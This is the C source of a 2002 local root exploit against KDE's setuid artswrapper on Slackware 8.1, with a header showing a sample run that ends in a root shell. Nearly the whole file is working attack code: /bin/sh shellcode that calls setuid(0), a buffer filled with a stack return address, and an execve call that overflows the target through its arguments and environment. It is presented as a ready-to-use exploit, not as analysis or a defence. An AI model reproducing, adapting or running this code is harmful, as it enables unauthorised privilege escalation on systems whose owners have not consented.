/*
 * ==================================================
 * artyfarty.c local /opt/kde/bin/artswrapper exploit
 * By: Knight420
 * 11/29/02
 *
 * Tested against: Slackware 8.1*suid by default
 *
 * Gr33tz to: sorbo, dvdman, qubit, borgon
 *
 * (C) COPYRIGHT Blue Ballz , 2002
 * all rights reserved
 * =================================================
 *
 * secure@xeon:~> ./artyfarty
 * Artswrapper Local exploit by: Knight420
 * Using offset 0xbfffff96
 * >> running as realtime process now (priority 50)
 * sh-2.05a# id
 * uid=0(root) gid=100(users) groups=100(users)
 */

#include <stdio.h>
#define STACK_START 0xC0000000

char shellcode[] =
      "\x31\xdb\x31\xc0\xb0\x1b\xcd\x80"
      "\x31\xdb\x89\xd8\xb0\x17\xcd\x80"
      "\xeb\x16\x31\xdb\x31\xc9\xf7\xe1"
      "\x5b\xb0\x0b\x88\x53\x07\x52\x53"
      "\x89\xe1\xcd\x80\xb0\x01\xcd\x80"
      "\xe8\xe5\xff\xff\xff/bin/sh";

int main(int argc, char *argv[]) {
        char buff[1033];
        char buff2[1033];
        int *ptr;
        int ret= STACK_START - 106;
        char *arg[] = { "artswrapper", "-m", buff, "-a foo", NULL } ;
        char *env[] = { buff2, NULL };

        for(ptr = (int*)&buff[0]; ptr < (int*)&buff[1033]; ptr++)
                *ptr = ret;
        buff[sizeof(buff)-1] = 0;
        snprintf(buff2,sizeof(buff2),"SHELL=%s",shellcode);
  printf("Artswrapper Local exploit by: Knight420\n");
        printf("Using offset %p\n",ret);
        execve("/opt/kde/bin/artswrapper",arg,env);
}